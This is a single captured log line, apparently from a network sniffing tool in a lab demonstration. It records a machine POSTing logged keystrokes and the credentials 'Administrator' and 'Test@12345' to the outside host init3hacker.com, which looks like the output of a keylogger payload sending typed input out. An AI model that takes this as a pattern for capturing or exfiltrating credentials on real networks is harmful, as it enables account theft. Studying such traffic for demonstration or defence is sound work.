192.168.1.0/24 > 192.168.1.1 » [07:13:57] [net.sniff.http.request] http 192.168.1.11 POST init3hacker.com/DYjczIig?=Administrator&Test%4012346MgUaNuILurh=A%2Cd%2Cm%2Ci%2Cn%2Ci%2Cs%2Ct%2Cr%2Ca%2Ct%2Co%2C%2Ct%2CBackspace%2CShift%2CT%2Ce%2Cs%2Ct%2C%40%2C1%2C2%2C3%2C4%2C5 HTTP/1.1

```